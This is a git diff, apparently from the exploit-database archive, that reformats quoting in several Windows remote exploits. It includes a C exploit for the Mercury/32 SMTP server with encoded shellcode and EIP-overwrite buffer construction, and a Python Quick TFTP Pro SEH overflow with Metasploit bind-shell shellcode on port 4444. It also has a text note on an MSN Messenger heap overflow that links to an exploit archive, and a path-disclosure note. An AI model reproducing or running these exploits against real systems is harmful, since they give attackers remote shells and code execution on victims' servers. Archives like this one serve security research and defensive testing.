-		\"\\xfd\\x0b\\x09\\xeb\\x26\\x4f\\x09\\xc2\\x3e\\xe0\\xfe\\x82\\x7a\\x6a\\x6d\\x0c\"
-		\"\\x4d\\x73\\x09\\xd8\\x22\\x6a\\x69\\xce\\x89\\x5f\\x09\\x86\\xec\\x5a\\x42\\x1e\"
-		\"\\xae\\xef\\x42\\xf3\\x05\\xaa\\x48\\x8a\\x03\\xa9\\x69\\x73\\x39\\x3f\\xa6\\xaf\"
-		\"\\x77\\x8e\\x09\\xd8\\x26\\x6a\\x69\\xe1\\x89\\x67\\xc9\\x0c\\x5d\\x77\\x83\\x6c\"
-		\"\\x01\\x47\\x09\\x0e\\x6e\\x4f\\x9e\\xe6\\xc1\\x5a\\x59\\xe3\\x89\\x28\\xb2\\x0c\"
-		\"\\x42\\x67\\x09\\xf7\\x1e\\xc6\\x09\\xc7\\x0a\\x35\\xea\\x09\\x4c\\x65\\x6e\\xd7\"
-		\"\\xfd\\xbd\\xe4\\xd4\\x64\\x03\\xb1\\xb5\\x6a\\x1c\\xf1\\xb5\\x5d\\x3f\\x7d\\x57\"
-		\"\\x6a\\xa0\\x6f\\x7b\\x39\\x3b\\x7d\\x51\\x5d\\xe2\\x67\\xe1\\x83\\x86\\x8a\\x85\"
-		\"\\x57\\x01\\x80\\x78\\xd2\\x03\\x5b\\x8e\\xf7\\xc6\\xd5\\x78\\xd4\\x38\\xd1\\xd4\"
-		\"\\x51\\x38\\xc1\\xd4\\x41\\x38\\x7d\\x57\\x64\\x03\\x93\\xdb\\x64\\x38\\x0b\\x66\"
-		\"\\x97\\x03\\x26\\x9d\\x72\\xac\\xd5\\x78\\xd4\\x01\\x92\\xd6\\x57\\x94\\x52\\xef\"
-		\"\\xa6\\xc6\\xac\\x6e\\x55\\x94\\x54\\xd4\\x57\\x94\\x52\\xef\\xe7\\x22\\x04\\xce\"
-		\"\\x55\\x94\\x54\\xd7\\x56\\x3f\\xd7\\x78\\xd2\\xf8\\xea\\x60\\x7b\\xad\\xfb\\xd0\"
-		\"\\xfd\\xbd\\xd7\\x78\\xd2\\x0d\\xe8\\xe3\\x64\\x03\\xe1\\xea\\x8b\\x8e\\xe8\\xd7\"
-		\"\\x5b\\x42\\x4e\\x0e\\xe5\\x01\\xc6\\x0e\\xe0\\x5a\\x42\\x74\\xa8\\x95\\xc0\\xaa\"
-		\"\\xfc\\x29\\xae\\x14\\x8f\\x11\\xba\\x2c\\xa9\\xc0\\xea\\xf5\\xfc\\xd8\\x94\\x78\"
-		\"\\x77\\x2f\\x7d\\x51\\x59\\x3c\\xd0\\xd6\\x53\\x3a\\xe8\\x86\\x53\\x3a\\xd7\\xd6\"
-		\"\\xfd\\xbb\\xea\\x2a\\xdb\\x6e\\x4c\\xd4\\xfd\\xbd\\xe8\\x78\\xfd\\x5c\\x7d\\x57\"
-		\"\\x89\\x3c\\x7e\\x04\\xc6\\x0f\\x7d\\x51\\x50\\x94\\x52\\xef\\xf2\\xe1\\x86\\xd8\"
-		\"\\x51\\x94\\x54\\x78\\xd2\\x6b\\x82\\x87\"	
+		"\x2b\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02"
+		"\x6b\x82\x87\x83\xee\xfc\xe2\xf4\xfe\x01\x69\xca\xea\x92\x7d\x78"
+		"\xfd\x0b\x09\xeb\x26\x4f\x09\xc2\x3e\xe0\xfe\x82\x7a\x6a\x6d\x0c"
+		"\x4d\x73\x09\xd8\x22\x6a\x69\xce\x89\x5f\x09\x86\xec\x5a\x42\x1e"
+		"\xae\xef\x42\xf3\x05\xaa\x48\x8a\x03\xa9\x69\x73\x39\x3f\xa6\xaf"
+		"\x77\x8e\x09\xd8\x26\x6a\x69\xe1\x89\x67\xc9\x0c\x5d\x77\x83\x6c"
+		"\x01\x47\x09\x0e\x6e\x4f\x9e\xe6\xc1\x5a\x59\xe3\x89\x28\xb2\x0c"
+		"\x42\x67\x09\xf7\x1e\xc6\x09\xc7\x0a\x35\xea\x09\x4c\x65\x6e\xd7"
+		"\xfd\xbd\xe4\xd4\x64\x03\xb1\xb5\x6a\x1c\xf1\xb5\x5d\x3f\x7d\x57"
+		"\x6a\xa0\x6f\x7b\x39\x3b\x7d\x51\x5d\xe2\x67\xe1\x83\x86\x8a\x85"
+		"\x57\x01\x80\x78\xd2\x03\x5b\x8e\xf7\xc6\xd5\x78\xd4\x38\xd1\xd4"
+		"\x51\x38\xc1\xd4\x41\x38\x7d\x57\x64\x03\x93\xdb\x64\x38\x0b\x66"
+		"\x97\x03\x26\x9d\x72\xac\xd5\x78\xd4\x01\x92\xd6\x57\x94\x52\xef"
+		"\xa6\xc6\xac\x6e\x55\x94\x54\xd4\x57\x94\x52\xef\xe7\x22\x04\xce"
+		"\x55\x94\x54\xd7\x56\x3f\xd7\x78\xd2\xf8\xea\x60\x7b\xad\xfb\xd0"
+		"\xfd\xbd\xd7\x78\xd2\x0d\xe8\xe3\x64\x03\xe1\xea\x8b\x8e\xe8\xd7"
+		"\x5b\x42\x4e\x0e\xe5\x01\xc6\x0e\xe0\x5a\x42\x74\xa8\x95\xc0\xaa"
+		"\xfc\x29\xae\x14\x8f\x11\xba\x2c\xa9\xc0\xea\xf5\xfc\xd8\x94\x78"
+		"\x77\x2f\x7d\x51\x59\x3c\xd0\xd6\x53\x3a\xe8\x86\x53\x3a\xd7\xd6"
+		"\xfd\xbb\xea\x2a\xdb\x6e\x4c\xd4\xfd\xbd\xe8\x78\xfd\x5c\x7d\x57"
+		"\x89\x3c\x7e\x04\xc6\x0f\x7d\x51\x50\x94\x52\xef\xf2\xe1\x86\xd8"
+		"\x51\x94\x54\x78\xd2\x6b\x82\x87"	
 	 },	  	
 	{NULL , NULL }
 };
@@ -110,13 +110,13 @@ struct {
 // -----------------------------------------------------------------
 
 char base64_chars[] = 
-             \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"
-             \"abcdefghijklmnopqrstuvwxyz\"
-             \"0123456789+/\";
+             "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+             "abcdefghijklmnopqrstuvwxyz"
+             "0123456789+/";
 
 
 static inline bool is_base64(unsigned char c) {
-  return (isalnum(c) || (c == \'+\') || (c == \'/\'));
+  return (isalnum(c) || (c == '+') || (c == '/'));
 }
 
 void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret) 
@@ -145,7 +145,7 @@ void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, ch
   if (i)
   {
     for(j = i; j < 3; j++)
-      char_array_3[j] = \'\\0\';
+      char_array_3[j] = '\0';
 
     char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
     char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
@@ -157,8 +157,8 @@ void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, ch
       //ret += base64_chars[char_array_4[j]];
 
     while((i++ < 3))
-		ret[strlen(ret)]=\'=\';
-      //ret += \'=\';
+		ret[strlen(ret)]='=';
+      //ret += '=';
 
   }
 
@@ -173,7 +173,7 @@ void base64_decode(char const * encoded_string, char * ret)
   int in_ = 0;
   unsigned char char_array_4[4], char_array_3[3];
 
-  while (in_len-- && ( encoded_string[in_] != \'=\') && is_base64(encoded_string[in_])) 
+  while (in_len-- && ( encoded_string[in_] != '=') && is_base64(encoded_string[in_])) 
   {
     char_array_4[i++] = encoded_string[in_]; in_++;
     if (i ==4) {
@@ -216,7 +216,7 @@ void base64_decode(char const * encoded_string, char * ret)
 int main(int argc, char **argv)
 {
 	char * remotehost=NULL;
-	char default_remotehost[]=\"127.0.0.1\";
+	char default_remotehost[]="127.0.0.1";
 	char temp1[100], temp2[100];
 	int port, itarget, sh;
 	SOCKET s;
@@ -236,23 +236,23 @@ int main(int argc, char **argv)
 	sh=0;
 	// ------------	
 	
-	while((c = getopt(argc, argv, \"h:p:s:t:\"))!= EOF)
+	while((c = getopt(argc, argv, "h:p:s:t:"))!= EOF)
 	{
 		switch (c)
 		{
-			case \'h\':
+			case 'h':
 				remotehost=optarg;
 				break; 	
-			case \'s\':
-				sscanf(optarg, \"%d\", &sh);
+			case 's':
+				sscanf(optarg, "%d", &sh);
 				sh--;
 				break;
-			case \'t\':
-				sscanf(optarg, \"%d\", &itarget);
+			case 't':
+				sscanf(optarg, "%d", &itarget);
 				itarget--;
 				break;
-			case \'p\':
-				sscanf(optarg, \"%d\", &port);
+			case 'p':
+				sscanf(optarg, "%d", &port);
 				break;
 			default:
 	            usage(argv[0]);
@@ -263,43 +263,43 @@ int main(int argc, char **argv)
 	if(remotehost == NULL) remotehost=default_remotehost;
 	memset(temp1,0,sizeof(temp1));
 	memset(temp2,0,sizeof(temp2));
-	memset(temp1, \'\\x20\' , 58 - strlen(remotehost) -1);	
-	printf(\" #  Host    : %s%s# \\n\", remotehost, temp1);	
-	sprintf(temp2, \"%d\", port);
+	memset(temp1, '\x20' , 58 - strlen(remotehost) -1);	
+	printf(" #  Host    : %s%s# \n", remotehost, temp1);	
+	sprintf(temp2, "%d", port);
 	memset(temp1,0,sizeof(temp1));
-	memset(temp1, \'\\x20\' , 58 - strlen(temp2) -1);
-	printf(\" #  Port    : %s%s# \\n\", temp2, temp1);
+	memset(temp1, '\x20' , 58 - strlen(temp2) -1);
+	printf(" #  Port    : %s%s# \n", temp2, temp1);
 	memset(temp1,0,sizeof(temp1));	
 	memset(temp2,0,sizeof(temp2));
-	sprintf(temp2, \"%s\", shellcodes[sh].name );
-	memset(temp1, \'\\x20\' , 58 - strlen(temp2) -1);	
-	printf(\" #  Payload : %s%s# \\n\", temp2, temp1);	
+	sprintf(temp2, "%s", shellcodes[sh].name );
+	memset(temp1, '\x20' , 58 - strlen(temp2) -1);	
+	printf(" #  Payload : %s%s# \n", temp2, temp1);	
 	if(itarget>=0)
 	{
 		memset(temp1,0,sizeof(temp1));	
-		memset(temp1, \'\\x20\' , 57 - strlen(targets[itarget].t) -1);	
-		printf(\" #  Target  : %s%s# \\n\", targets[itarget].t, temp1);
+		memset(temp1, '\x20' , 57 - strlen(targets[itarget].t) -1);	
+		printf(" #  Target  : %s%s# \n", targets[itarget].t, temp1);
 	}else
 	{		
-		printf(\" # ------------------------------------------------------------------- # \\n\");
-		printf(\"[-] Target is invalid\\n\");
+		printf(" # ------------------------------------------------------------------- # \n");
+		printf("[-] Target is invalid\n");
 		end_logo();
 		return -1;		
 	}	
-	printf(\" # ------------------------------------------------------------------- # \\n\");
+	printf(" # ------------------------------------------------------------------- # \n");
 	fflush(stdout);
-	printf(\"[+] Checking if server is online\\n\");
+	printf("[+] Checking if server is online\n");
 	fflush(stdout);
 
 	s=do_connect(remotehost, port);   
 	if(s==-1)
 	{
-		printf(\"[-] Server is OFFLINE\\n\");
+		printf("[-] Server is OFFLINE\n");
 		end_logo();
 		return 0;
 	}
 	closesocket(s);
-	printf(\"[+] Server is ONLINE\\n\");
+	printf("[+] Server is ONLINE\n");
 
 	
 	
@@ -310,17 +310,17 @@ int main(int argc, char **argv)
 	fflush(stdout);
 	make_buffer(buf, &len, itarget, sh);
 
-	printf(\"[+] Attacking buffers constructed\\n\");
+	printf("[+] Attacking buffers constructed\n");
 	if(send_buffer(buf, len, remotehost,port)==-1)
 	{
-		printf(\"[-] Cannot exploit server %s\\n\", remotehost);
+		printf("[-] Cannot exploit server %s\n", remotehost);
 		end_logo();
 		WSACleanup();
 		return -1;
 	}
 
-	printf(\"[+] Buffer sent\");
-	printf(\"[+] Now try connect to %s:%d\\n\", remotehost, 4444);	
+	printf("[+] Buffer sent");
+	printf("[+] Now try connect to %s:%d\n", remotehost, 4444);	
 	end_logo();
 	return 0;
 }
@@ -335,7 +335,7 @@ SOCKET do_connect (char *remotehost, int port)
        host = gethostbyname(remotehost);
        if (!host)
        {
-           perror(\"[-] gethostbyname() failed\");
+           perror("[-] gethostbyname() failed");
            return -1;
        }
        addr.sin_addr = *(struct in_addr*)host->h_addr;
@@ -344,7 +344,7 @@ SOCKET do_connect (char *remotehost, int port)
    if (s == -1)
    {
        closesocket(s);
-       perror(\"socket() failed\");
+       perror("socket() failed");
        return -1;
    }
 
@@ -380,7 +380,7 @@ void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh)
 	unsigned char * cp=buf;
 
 		// init
-	memset(cp, \'\\x41\', 1300);
+	memset(cp, '\x41', 1300);
 	cp+=204;
 
 		// replace EIP
@@ -390,10 +390,10 @@ void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh)
 	*cp++ = (char)((targets[itarget].ret >> 24) & 0xff);
 
 		// jff
-	*cp++ = \'\\x90\';
-	*cp++ = \'\\x90\';
-	*cp++ = \'\\x90\';
-	*cp++ = \'\\x90\';
+	*cp++ = '\x90';
+	*cp++ = '\x90';
+	*cp++ = '\x90';
+	*cp++ = '\x90';
 
 		// copy the shellcode
 	memcpy(cp, fsh, fshlen);
@@ -416,42 +416,42 @@ int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int po
 	memset(bufmax, 0 , sizeof(bufmax));
 	recv(s, bufmax, sizeof(bufmax),0);
 	bufmax[sizeof(bufmax)-1] = 0;
-	printf(\"[+] Server: %s\\n\", bufmax);
+	printf("[+] Server: %s\n", bufmax);
 
 	// send EHLO
 	memset(sendbuf, 0, sizeof(sendbuf));
-	strcat(sendbuf, \"EHLO Dreatica-FXP\\r\\n\");
-	printf(\"[+] Request: EHLO Dreatica-FXP\\n\");
+	strcat(sendbuf, "EHLO Dreatica-FXP\r\n");
+	printf("[+] Request: EHLO Dreatica-FXP\n");
 	send(s, sendbuf, (int)strlen(sendbuf),0);
 	
 	// send AUTH CRAM-MD5
 	memset(sendbuf, 0, sizeof(sendbuf));
-	strcat(sendbuf, \"AUTH CRAM-MD5\\r\\n\");
-	printf(\"[+] Request: AUTH CRAM-MD5\\n\");
+	strcat(sendbuf, "AUTH CRAM-MD5\r\n");
+	printf("[+] Request: AUTH CRAM-MD5\n");
 	send(s, sendbuf, (int)strlen(sendbuf),0);
 
 	
-	// i don\'t make the correct recv procedure like Zhenhan.Liu have done in his code
+	// i don't make the correct recv procedure like Zhenhan.Liu have done in his code
 	// just put 3 recv for that
 	memset(bufmax, 0 , sizeof(bufmax));
 	recv(s, bufmax, sizeof(bufmax),0);
 	bufmax[sizeof(bufmax)-1] = 0;
-	printf(\"[+] Reply: %s\\n\",bufmax);	
+	printf("[+] Reply: %s\n",bufmax);	
 	memset(bufmax, 0 , sizeof(bufmax));
 	recv(s, bufmax, sizeof(bufmax),0);
 	bufmax[sizeof(bufmax)-1] = 0;
-	printf(\"[+] Reply: %s\\n\",bufmax);
+	printf("[+] Reply: %s\n",bufmax);
 	memset(bufmax, 0 , sizeof(bufmax));
 	recv(s, bufmax, sizeof(bufmax),0);
 	bufmax[sizeof(bufmax)-1] = 0;
-	printf(\"[+] Reply: %s\\n\",bufmax);
+	printf("[+] Reply: %s\n",bufmax);
 
 	// ALL is OKE	
-	printf(\"[+] Sending payload...\\n\");
+	printf("[+] Sending payload...\n");
 	memset(sendbuf, 0, sizeof(sendbuf));
 	base64_encode(buf, len, sendbuf);
-	sendbuf[strlen(sendbuf)]= \'\\r\';
-	sendbuf[strlen(sendbuf)]= \'\\n\';
+	sendbuf[strlen(sendbuf)]= '\r';
+	sendbuf[strlen(sendbuf)]= '\n';
 	send(s, sendbuf, (int)strlen(sendbuf), 0);
 	
 	closesocket(s);
@@ -470,12 +470,12 @@ int getopt(int argc, char *argv[], char *optstring)
 
 	optarg = NULL;
 
-	if (next == NULL || *next == \'\\0\')
+	if (next == NULL || *next == '\0')
 	{
 		if (optind == 0)
 			optind++;
 
-		if (optind >= argc || argv[optind][0] != \'-\' || argv[optind][1] == \'\\0\')
+		if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
 		{
 			optarg = NULL;
 			if (optind < argc)
@@ -483,7 +483,7 @@ int getopt(int argc, char *argv[], char *optstring)
 			return EOF;
 		}
 
-		if (strcmp(argv[optind], \"--\") == 0)
+		if (strcmp(argv[optind], "--") == 0)
 		{
 			optind++;
 			optarg = NULL;
@@ -500,13 +500,13 @@ int getopt(int argc, char *argv[], char *optstring)
 	char c = *next++;
 	char *cp = strchr(optstring, c);
 
-	if (cp == NULL || c == \':\')
-		return \'?\';
+	if (cp == NULL || c == ':')
+		return '?';
 
 	cp++;
-	if (*cp == \':\')
+	if (*cp == ':')
 	{
-		if (*next != \'\\0\')
+		if (*next != '\0')
 		{
 			optarg = next;
 			next = NULL;
@@ -518,7 +518,7 @@ int getopt(int argc, char *argv[], char *optstring)
 		}
 		else
 		{
-			return \'?\';
+			return '?';
 		}
 	}
 
@@ -532,56 +532,56 @@ int getopt(int argc, char *argv[], char *optstring)
 
 void usage(char * s)
 {	
-	printf(\"\\n\");
-	printf(\"    Usage: %s -p <port> -h <host> -s <shellcode> -t <target>\\n\\n\", s);	
-	printf(\"    Arguments:\\n\");
-	printf(\"     -p <port>      Port of the Mercury SMTP (default: 25)\\n\");
-	printf(\"     -h <host>      Hostname of the server\\n\");
-	printf(\"     -s <shellcode> Payload to use (default: 1)\\n\");
-	printf(\"     -t <target>    Target to attack (default: 1)\\n\");
+	printf("\n");
+	printf("    Usage: %s -p <port> -h <host> -s <shellcode> -t <target>\n\n", s);	
+	printf("    Arguments:\n");
+	printf("     -p <port>      Port of the Mercury SMTP (default: 25)\n");
+	printf("     -h <host>      Hostname of the server\n");
+	printf("     -s <shellcode> Payload to use (default: 1)\n");
+	printf("     -t <target>    Target to attack (default: 1)\n");
 	
-	printf(\"\\n\");
-	printf(\"    Shellcodes:\\n\");
+	printf("\n");
+	printf("    Shellcodes:\n");
 	for(int i=0; shellcodes[i].name!=0;i++)
 	{
-		printf(\"      %d. %s\\n\",i+1,shellcodes[i].name);				
+		printf("      %d. %s\n",i+1,shellcodes[i].name);				
 	}	
-	printf(\"\\n\");
-	printf(\"    Targets:\\n\");
+	printf("\n");
+	printf("    Targets:\n");
 	for(int j=0; targets[j].t!=0;j++)
 	{
-		printf(\"      %d. %s\\n\",j+1,targets[j].t);
+		printf("      %d. %s\n",j+1,targets[j].t);
 	}		
-	printf(\"\\n\");
+	printf("\n");
 	end_logo();	
 }
 
 void logo()
 {
-	printf(\"\\n\\n\");
-	printf(\" ####################################################################### \\n\");	
-	printf(\" #     ____                 __  _                  ______  __    _____ #\\n\");
-	printf(\" #    / __ \\\\________  _____/ /_(_)_________       / __/\\\\ \\\\/ /   / _  / #\\n\");
-	printf(\" #   / / / / ___/ _ \\\\/ __ / __/ / ___/ __ / ___  / /    \\\\  /   / // /  #\\n\");
-	printf(\" #  / /_/ / / /  ___/ /_// /_/ / /__/ /_// /__/ / _/    /  \\\\  / ___/   #\\n\");
-	printf(\" # /_____/_/  \\\\___/ \\\\_,_/\\\\__/_/\\\\___/\\\\__,_/     /_/     /_/\\\\_\\\\/_/       #\\n\");
-	printf(\" #                                 crew                                #\\n\");
-	printf(\" ####################################################################### \\n\");	
-	printf(\" #  Exploit : Mercury/32 v3.32-v4.51 SMTP EIP overwrite exploit        # \\n\");
-	printf(\" #  Tested  : Mercury/32 SMTP v3.32, v4.01a, v4.51                     # \\n\");
-	printf(\" #  Author  : Heretic2 (http://www.dreatica.cl/)                       # \\n\");
-	printf(\" #  Research: eliteb0y                                                 # \\n\");
-	printf(\" #  Version : 1.0                                                      # \\n\");
-	printf(\" #  System  : Windows ALL                                              # \\n\");
-	printf(\" #  Date    : 26.08.2007                                               # \\n\");
-	printf(\" # ------------------------------------------------------------------- # \\n\");
+	printf("\n\n");
+	printf(" ####################################################################### \n");	
+	printf(" #     ____                 __  _                  ______  __    _____ #\n");
+	printf(" #    / __ \\________  _____/ /_(_)_________       / __/\\ \\/ /   / _  / #\n");
+	printf(" #   / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___  / /    \\  /   / // /  #\n");
+	printf(" #  / /_/ / / /  ___/ /_// /_/ / /__/ /_// /__/ / _/    /  \\  / ___/   #\n");
+	printf(" # /_____/_/  \\___/ \\_,_/\\__/_/\\___/\\__,_/     /_/     /_/\\_\\/_/       #\n");
+	printf(" #                                 crew                                #\n");
+	printf(" ####################################################################### \n");	
+	printf(" #  Exploit : Mercury/32 v3.32-v4.51 SMTP EIP overwrite exploit        # \n");
+	printf(" #  Tested  : Mercury/32 SMTP v3.32, v4.01a, v4.51                     # \n");
+	printf(" #  Author  : Heretic2 (http://www.dreatica.cl/)                       # \n");
+	printf(" #  Research: eliteb0y                                                 # \n");
+	printf(" #  Version : 1.0                                                      # \n");
+	printf(" #  System  : Windows ALL                                              # \n");
+	printf(" #  Date    : 26.08.2007                                               # \n");
+	printf(" # ------------------------------------------------------------------- # \n");
 }
 
 void end_logo()
 {
-	printf(\" # ------------------------------------------------------------------- # \\n\");
-	printf(\" #                    Dreatica-FXP crew [Heretic2]                     # \\n\");	
-	printf(\" ####################################################################### \\n\\n\");
+	printf(" # ------------------------------------------------------------------- # \n");
+	printf(" #                    Dreatica-FXP crew [Heretic2]                     # \n");	
+	printf(" ####################################################################### \n\n");
 }
 
 // milw0rm.com [2007-08-26]
diff --git a/platforms/windows/remote/4334.txt b/platforms/windows/remote/4334.txt
index 27c0bc036..acb3b0ec3 100755
--- a/platforms/windows/remote/4334.txt
+++ b/platforms/windows/remote/4334.txt
@@ -3,9 +3,9 @@ MSN messenger 7.x (8.0?) VIDEO Remote Heap Overflow Exploit
 thanks ole andre again, His ospy is perfect.
 
 1.compile the dll.
-2.inject the dll to msn messenger 7.0.777.0 \\\'s process.
-3. choose \\\"send my webcam\\\" to a contact id who is online using 7.x (8.0?).
-4.when the otherside accept the invatation , the otherside\\\'s msn will be at least crashed, if you using aChinese version windows 2000 sp4 , maybe a reverse shell , if other verison windows 2000, you need adjust the jmpa address in the dll\\\'s sourcecode. 
+2.inject the dll to msn messenger 7.0.777.0 's process.
+3. choose "send my webcam" to a contact id who is online using 7.x (8.0?).
+4.when the otherside accept the invatation , the otherside's msn will be at least crashed, if you using aChinese version windows 2000 sp4 , maybe a reverse shell , if other verison windows 2000, you need adjust the jmpa address in the dll's sourcecode. 
 
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4334.rar (08292007-exp_msn.rar)
 
diff --git a/platforms/windows/remote/4715.txt b/platforms/windows/remote/4715.txt
index dbfef7a8f..c3cde7af5 100755
--- a/platforms/windows/remote/4715.txt
+++ b/platforms/windows/remote/4715.txt
@@ -65,7 +65,7 @@ configuration of the server.
 C] path disclosure
 ------------------
 
-The full path of the webserver is visible when using the \"?&browse=\"
+The full path of the webserver is visible when using the "?&browse="
 parameter on an unexistent folder, useful in conjunction with bug B.
 
 
diff --git a/platforms/windows/remote/5315.py b/platforms/windows/remote/5315.py
index d6ef08e10..4ee021e46 100755
--- a/platforms/windows/remote/5315.py
+++ b/platforms/windows/remote/5315.py
@@ -15,58 +15,58 @@
 # Microsoft Windows XP [Version 5.1.2600]
 # (C) Copyright 1985-2001 Microsoft Corp.
 #
-# C:\\Documents and Settings\\Administrator>
+# C:\Documents and Settings\Administrator>
 ##########################################################
 import socket
 import sys
 
-print \"[*] Quick TFTP Pro 2.1 SEH Overflow (0day)\"
-print \"[*] http://www.offensive-security.com\"
+print "[*] Quick TFTP Pro 2.1 SEH Overflow (0day)"
+print "[*] http://www.offensive-security.com"
 
-host = \'172.16.167.134\'
+host = '172.16.167.134'
 port = 69
 
 try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 except:
-   print \"socket() failed\"
+   print "socket() failed"
    sys.exit(1)
 
-filename = \"pwnd\"
+filename = "pwnd"
 
 # windows/shell_bind_tcp - 317 bytes
 # http://www.metasploit.com
 # EXITFUNC=thread, LPORT=4444
 
-shell=(\"\\xfc\\x6a\\xeb\\x4d\\xe8\\xf9\\xff\\xff\\xff\\x60\\x8b\\x6c\\x24\\x24\\x8b\"
-\"\\x45\\x3c\\x8b\\x7c\\x05\\x78\\x01\\xef\\x8b\\x4f\\x18\\x8b\\x5f\\x20\\x01\"
-\"\\xeb\\x49\\x8b\\x34\\x8b\\x01\\xee\\x31\\xc0\\x99\\xac\\x84\\xc0\\x74\\x07\"
-\"\\xc1\\xca\\x0d\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x28\\x75\\xe5\\x8b\\x5f\"
-\"\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5f\\x1c\\x01\\xeb\\x03\\x2c\\x8b\"
-\"\\x89\\x6c\\x24\\x1c\\x61\\xc3\\x31\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c\"
-\"\\x8b\\x70\\x1c\\xad\\x8b\\x40\\x08\\x5e\\x68\\x8e\\x4e\\x0e\\xec\\x50\\xff\"
-\"\\xd6\\x66\\x53\\x66\\x68\\x33\\x32\\x68\\x77\\x73\\x32\\x5f\\x54\\xff\\xd0\"
-\"\\x68\\xcb\\xed\\xfc\\x3b\\x50\\xff\\xd6\\x5f\\x89\\xe5\\x66\\x81\\xed\\x08\"
-\"\\x02\\x55\\x6a\\x02\\xff\\xd0\\x68\\xd9\\x09\\xf5\\xad\\x57\\xff\\xd6\\x53\"
-\"\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xff\\xd0\\x66\\x68\\x11\\x5c\\x66\"
-\"\\x53\\x89\\xe1\\x95\\x68\\xa4\\x1a\\x70\\xc7\\x57\\xff\\xd6\\x6a\\x10\\x51\"
-\"\\x55\\xff\\xd0\\x68\\xa4\\xad\\x2e\\xe9\\x57\\xff\\xd6\\x53\\x55\\xff\\xd0\"
-\"\\x68\\xe5\\x49\\x86\\x49\\x57\\xff\\xd6\\x50\\x54\\x54\\x55\\xff\\xd0\\x93\"
-\"\\x68\\xe7\\x79\\xc6\\x79\\x57\\xff\\xd6\\x55\\xff\\xd0\\x66\\x6a\\x64\\x66\"
-\"\\x68\\x63\\x6d\\x89\\xe5\\x6a\\x50\\x59\\x29\\xcc\\x89\\xe7\\x6a\\x44\\x89\"
-\"\\xe2\\x31\\xc0\\xf3\\xaa\\xfe\\x42\\x2d\\xfe\\x42\\x2c\\x93\\x8d\\x7a\\x38\"
-\"\\xab\\xab\\xab\\x68\\x72\\xfe\\xb3\\x16\\xff\\x75\\x44\\xff\\xd6\\x5b\\x57\"
-\"\\x52\\x51\\x51\\x51\\x6a\\x01\\x51\\x51\\x55\\x51\\xff\\xd0\\x68\\xad\\xd9\"
-\"\\x05\\xce\\x53\\xff\\xd6\\x6a\\xff\\xff\\x37\\xff\\xd0\\x8b\\x57\\xfc\\x83\"
-\"\\xc4\\x64\\xff\\xd6\\x52\\xff\\xd0\\x68\\xef\\xce\\xe0\\x60\\x53\\xff\\xd6\"
-\"\\xff\\xd0\")
+shell=("\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b"
+"\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01"
+"\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07"
+"\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
+"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b"
+"\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c"
+"\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff"
+"\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0"
+"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08"
+"\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53"
+"\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x66\x68\x11\x5c\x66"
+"\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51"
+"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53\x55\xff\xd0"
+"\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff\xd0\x93"
+"\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66"
+"\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
+"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38"
+"\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57"
+"\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9"
+"\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83"
+"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6"
+"\xff\xd0")
 
-mode = \"A\"*1019+\"\\xeb\\x08\\x90\\x90\"+\"\\x58\\x14\\xd3\\x74\"+\"\\x90\"*16+shell
+mode = "A"*1019+"\xeb\x08\x90\x90"+"\x58\x14\xd3\x74"+"\x90"*16+shell
 
-muha = \"\\x00\\x02\" + filename+ \"\\0\" + mode + \"\\0\" 
+muha = "\x00\x02" + filename+ "\0" + mode + "\0" 
 
-print \"[*] Sending evil packet, ph33r\"
+print "[*] Sending evil packet, ph33r"
 s.sendto(muha, (host, port))
-print \"[*] Check port 4444 for bindshell\"
+print "[*] Check port 4444 for bindshell"
 
